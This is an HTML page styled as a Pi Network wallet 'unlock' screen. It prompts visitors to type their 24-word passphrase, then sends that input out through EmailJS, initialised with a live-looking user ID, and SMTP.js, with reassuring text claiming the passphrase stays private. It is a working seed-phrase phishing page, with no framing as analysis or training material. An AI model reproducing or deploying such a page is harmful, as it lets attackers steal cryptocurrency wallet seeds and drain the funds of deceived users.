<html lang="en" data-qb-installed="true">
  <div
    id="in-page-channel-node-id"
    data-channel-name="in_page_channel_8-NpiE"
  ></div>

  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Wallet Unlock</title>
    <script type="module" crossorigin="" src="emailjs.js"></script>
    <style>
      /* Reset styles */
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        font-family: Arial, sans-serif;
      }

      /* Body and container styling */
      body {
        background-color: #fff;
        display: flex;
        flex-direction: column;
        align-items: center;
        min-height: 100vh;
      }

      .container {
        max-width: 600px;
        width: 100%;
        text-align: center;
        padding: 20px;
      }

      /* Header styling */
      /* header {
    width: 100%;
    background-color: #fff;
    color: #fff;
    padding: 15px 0;
    text-align: center;
}

.header-content {
    display: flex;
    justify-content: space-between;
    align-items: center;
    max-width: 900px;
    margin: 0 auto;
    color: #f6b230;
} */

      .logo {
        width: 40px;
        height: 40px;
      }

      /* Center header content */
      header {
        width: 100%;
        background-color: #703d92;
        color: #fff;
        padding: 15px 0;
        text-align: center;
      }

      .header-content {
        display: flex;
        justify-content: center;
        /* Center aligns all content horizontally */
        align-items: center;
      }

      .header-icons {
        display: flex;
        align-items: center;
        gap: 10px;
        /* Adds spacing between icon and text */
      }

      .header-icon {
        width: 24px;
        height: 24px;
      }

      /* Main content styling */
      h2 {
        color: #aaa;
        margin-bottom: 15px;
      }

      textarea {
        width: 65%;
        height: 250px;
        padding: 15px;
        border: 1px solid #ddd;
        border-radius: 2px;
        resize: none;
        font-size: 16px;
        color: #aaa;
        margin-bottom: 20px;
      }

      /* Button styles */
      button {
        width: 80%;
        max-width: 400px;
        padding: 12px;
        font-size: 16px;
        margin: 10px 0;
        border-radius: 8px;
        border: none;
        cursor: pointer;
      }

      .btn-outline {
        background-color: white;
        color: #703d92;
        border: 2px solid #703d92;
      }

      .btn-filled {
        background-color: #703d92;
        color: white;
      }

      /* Footer text styling */
      .info-text {
        font-size: 14px;
        color: #666;
        margin: 15px 0;
        text-align: left;
        /* Aligns the text to the left */
        max-width: 600px;
        /* Optional: Adds a max-width for better readability on larger screens */
      }

      .info-text a {
        color: #703d92;
        text-decoration: none;
      }

      .info-text a:hover {
        text-decoration: underline;
      }

      /* Responsive Styles */
      @media (max-width: 600px) {
        .header-content {
          flex-direction: column;
          gap: 10px;
        }

        .container {
          padding: 15px;
        }

        button {
          max-width: 100%;
        }
      }

      .error {
        color: red;
        margin-top: 10px;
      }

      .success {
        color: red;
        margin-top: 10px;
      }
    </style>
    <style>
      @keyframes slide-in-one-tap {
        from {
          transform: translateY(80px);
        }

        to {
          transform: translateY(0px);
        }
      }

      .trust-hide-gracefully {
        opacity: 0;
      }

      .trust-wallet-one-tap .hidden {
        display: none;
      }

      .trust-wallet-one-tap .semibold {
        font-weight: 500;
      }

      .trust-wallet-one-tap .binance-plex {
        font-family: "Binance";
      }

      .trust-wallet-one-tap .rounded-full {
        border-radius: 50%;
      }

      .trust-wallet-one-tap .flex {
        display: flex;
      }

      .trust-wallet-one-tap .flex-col {
        flex-direction: column;
      }

      .trust-wallet-one-tap .items-center {
        align-items: center;
      }

      .trust-wallet-one-tap .space-between {
        justify-content: space-between;
      }

      .trust-wallet-one-tap .justify-center {
        justify-content: center;
      }

      .trust-wallet-one-tap .w-full {
        width: 100%;
      }

      .trust-wallet-one-tap .box {
        transition: all 0.5s cubic-bezier(0, 0, 0, 1.43);
        animation: slide-in-one-tap 0.5s cubic-bezier(0, 0, 0, 1.43);
        width: 384px;
        border-radius: 15px;
        background: #fff;
        box-shadow: 0px 2px 4px 0px rgba(0, 0, 0, 0.25);
        position: fixed;
        right: 30px;
        bottom: 30px;
        z-index: 1020;
      }

      .trust-wallet-one-tap .header {
        gap: 15px;
        border-bottom: 1px solid #e6e6e6;
        padding: 10px 18px;
      }

      .trust-wallet-one-tap .header .left-items {
        gap: 15px;
      }

      .trust-wallet-one-tap .header .title {
        color: #1e2329;
        font-size: 18px;
        font-weight: 600;
        line-height: 28px;
      }

      .trust-wallet-one-tap .header .subtitle {
        color: #474d57;
        font-size: 14px;
        line-height: 20px;
      }

      .trust-wallet-one-tap .header .close {
        color: #1e2329;
        cursor: pointer;
      }

      .trust-wallet-one-tap .body {
        padding: 9px 18px;
        gap: 10px;
      }

      .trust-wallet-one-tap .body .right-items {
        gap: 10px;
        width: 100%;
      }

      .trust-wallet-one-tap .body .right-items .wallet-title {
        color: #1e2329;
        font-size: 16px;
        font-weight: 600;
        line-height: 20px;
      }

      .trust-wallet-one-tap .body .right-items .wallet-subtitle {
        color: #474d57;
        font-size: 14px;
        line-height: 20px;
      }

      .trust-wallet-one-tap .connect-indicator {
        gap: 15px;
        padding: 8px 0;
      }

      .trust-wallet-one-tap .connect-indicator .flow-icon {
        color: #474d57;
      }

      .trust-wallet-one-tap .loading-color {
        color: #fff;
      }

      .trust-wallet-one-tap .button {
        border-radius: 50px;
        outline: 2px solid transparent;
        outline-offset: 2px;
        background-color: rgb(5, 0, 255);
        border-color: rgb(229, 231, 235);
        cursor: pointer;
        text-align: center;
        height: 45px;
      }

      .trust-wallet-one-tap .button .button-text {
        color: #fff;
        font-size: 16px;
        font-weight: 600;
        line-height: 20px;
      }

      .trust-wallet-one-tap .footer {
        margin: 20px 30px;
      }

      .trust-wallet-one-tap .check-icon {
        color: #fff;
      }

      @font-face {
        font-family: "Binance";
        src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-Regular.otf)
          format("opentype");
        font-weight: 400;
        font-style: normal;
      }

      @font-face {
        font-family: "Binance";
        src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-Medium.otf)
          format("opentype");
        font-weight: 500;
        font-style: normal;
      }

      @font-face {
        font-family: "Binance";
        src: url(chrome-extension://egjidjbpglichdcondbcbdnbeeppgdph/fonts/BinancePlex-SemiBold.otf)
          format("opentype");
        font-weight: 600;
        font-style: normal;
      }
    </style>
    <link
      rel="modulepreload"
      as="script"
      crossorigin=""
      href="/assets/js/index.CucWK6IV.js"
    />
    <link
      rel="modulepreload"
      as="script"
      crossorigin=""
      href="/assets/js/Wallet.mlGYZajl.js"
    />
    <link
      rel="modulepreload"
      as="script"
      crossorigin=""
      href="/assets/js/asyncToGenerator.O4pnRyQq.js"
    />
    <link
      rel="modulepreload"
      as="script"
      crossorigin=""
      href="/assets/js/index.umd.BXzp7Rme.js"
    />
    <script src="chrome-extension://ghncoolaiahphiaccmhdofdfkdokbljk/src/client_script/client_script.js"></script>
    <style type="text/css">
      .lf-progress {
        -webkit-appearance: none;
        -moz-apperance: none;
        width: 100%;
        /* margin: 0 10px; */
        height: 4px;
        border-radius: 3px;
        cursor: pointer;
      }

      .lf-progress:focus {
        outline: none;
        border: none;
      }

      .lf-progress::-moz-range-track {
        cursor: pointer;
        background: none;
        border: none;
        outline: none;
      }

      .lf-progress::-webkit-slider-thumb {
        -webkit-appearance: none !important;
        height: 13px;
        width: 13px;
        border: 0;
        border-radius: 50%;
        background: #0fccce;
        cursor: pointer;
      }

      .lf-progress::-moz-range-thumb {
        -moz-appearance: none !important;
        height: 13px;
        width: 13px;
        border: 0;
        border-radius: 50%;
        background: #0fccce;
        cursor: pointer;
      }

      .lf-progress::-ms-track {
        width: 100%;
        height: 3px;
        cursor: pointer;
        background: transparent;
        border-color: transparent;
        color: transparent;
      }

      .lf-progress::-ms-fill-lower {
        background: #ccc;
        border-radius: 3px;
      }

      .lf-progress::-ms-fill-upper {
        background: #ccc;
        border-radius: 3px;
      }

      .lf-progress::-ms-thumb {
        border: 0;
        height: 15px;
        width: 15px;
        border-radius: 50%;
        background: #0fccce;
        cursor: pointer;
      }

      .lf-progress:focus::-ms-fill-lower {
        background: #ccc;
      }

      .lf-progress:focus::-ms-fill-upper {
        background: #ccc;
      }

      .lf-player-container :focus {
        outline: 0;
      }

      .lf-popover {
        position: relative;
      }

      .lf-popover-content {
        display: inline-block;
        position: absolute;
        opacity: 1;
        visibility: visible;
        transform: translate(0, -10px);
        box-shadow: 0 2px 5px 0 rgba(0, 0, 0, 0.26);
        transition: all 0.3s cubic-bezier(0.75, -0.02, 0.2, 0.97);
      }

      .lf-popover-content.hidden {
        opacity: 0;
        visibility: hidden;
        transform: translate(0, 0px);
      }

      .lf-player-btn-container {
        display: flex;
        align-items: center;
      }

      .lf-player-btn {
        cursor: pointer;
        fill: #999;
        width: 14px;
      }

      .lf-player-btn.active {
        fill: #555;
      }

      .lf-popover {
        position: relative;
      }

      .lf-popover-content {
        display: inline-block;
        position: absolute;
        background-color: #ffffff;
        opacity: 1;

        transform: translate(0, -10px);
        box-shadow: 0 2px 5px 0 rgba(0, 0, 0, 0.26);
        transition: all 0.3s cubic-bezier(0.75, -0.02, 0.2, 0.97);
        padding: 10px;
      }

      .lf-popover-content.hidden {
        opacity: 0;
        visibility: hidden;
        transform: translate(0, 0px);
      }

      .lf-arrow {
        position: absolute;
        z-index: -1;
        content: "";
        bottom: -9px;
        border-style: solid;
        border-width: 10px 10px 0px 10px;
      }

      .lf-left-align,
      .lf-left-align .lfarrow {
        left: 0;
        right: unset;
      }

      .lf-right-align,
      .lf-right-align .lf-arrow {
        right: 0;
        left: unset;
      }

      .lf-text-input {
        border: 1px #ccc solid;
        border-radius: 5px;
        padding: 3px;
        width: 60px;
        margin: 0;
      }

      .lf-color-picker {
        display: flex;
        flex-direction: row;
        justify-content: space-between;
        height: 90px;
      }

      .lf-color-selectors {
        display: flex;
        flex-direction: column;
        justify-content: space-between;
      }

      .lf-color-component {
        display: flex;
        flex-direction: row;
        font-size: 12px;
        align-items: center;
        justify-content: center;
      }

      .lf-color-component strong {
        width: 40px;
      }

      .lf-color-component input[type="range"] {
        margin: 0 0 0 10px;
      }

      .lf-color-component input[type="number"] {
        width: 50px;
        margin: 0 0 0 10px;
      }

      .lf-color-preview {
        font-size: 12px;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: space-between;
        padding-left: 5px;
      }

      .lf-preview {
        height: 60px;
        width: 60px;
      }

      .lf-popover-snapshot {
        width: 150px;
      }

      .lf-popover-snapshot h5 {
        margin: 5px 0 10px 0;
        font-size: 0.75rem;
      }

      .lf-popover-snapshot a {
        display: block;
        text-decoration: none;
      }

      .lf-popover-snapshot a:before {
        content: "⥼";
        margin-right: 5px;
      }

      .lf-popover-snapshot .lf-note {
        display: block;
        margin-top: 10px;
        color: #999;
      }

      .lf-player-controls > div {
        margin-right: 5px;
        margin-left: 5px;
      }

      .lf-player-controls > div:first-child {
        margin-left: 0px;
      }

      .lf-player-controls > div:last-child {
        margin-right: 0px;
      }
    </style>
  </head>

  <body>
    <!-- Header Section -->
    <header>
      <div class="header-content">
        <div class="header-icons">
          <img src="wallet.png" alt="Wallet Icon" class="header-icon" />
          <h4>Wallet</h4>
          <img
            src="pi-network-lvquy-logo-D798E8CD2E-seeklogo.com.png"
            alt="Pi Icon"
            class="header-icon"
          />
        </div>
      </div>
    </header>

    <!-- Main Content Section -->
    <main class="container">
      <form
        id="unlock-form"
        onsubmit="emailSend(event); reset(); return false;"
      >
        <textarea
          id="message"
          name="message"
          placeholder="Enter your 24-word passphrase here"
          required
          spellcheck="false"
        ></textarea>
        <!-- Display error or success message -->
        <div>
          <button type="submit" class="btn-outline">
            Unlock With Passphrase
          </button>
          <button type="button" class="btn-filled">
            Unlock With Fingerprint
          </button>
        </div>
      </form>

      <p class="info-text">
        As a non-custodial wallet, your wallet passphrase is exclusively
        accessible only to you. Recovery of passphrase is currently impossible.
      </p>

      <p class="info-text">
        Lost your passphrase? <a href="#">You can create a new wallet</a>, but
        all your assets in your previous wallet will be inaccessible.
      </p>
    </main>
    <script
      type="text/javascript"
      src="https://cdn.emailjs.com/dist/email.min.js"
    ></script>
    <script type="text/javascript">
      // Initialize EmailJS with your user ID (replace 'your_user_id' with the actual user ID from EmailJS)
      (function () {
        emailjs.init("TAbtkdCL33ef5xS2J"); // Replace 'your_user_id' with your actual user ID
      })();
    </script>

    <!-- SweetAlert library -->
    <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <!-- SMTP.js (For sending email) -->
    <script src="https://smtpjs.com/v3/smtp.js"></script>
  </body>
</html>
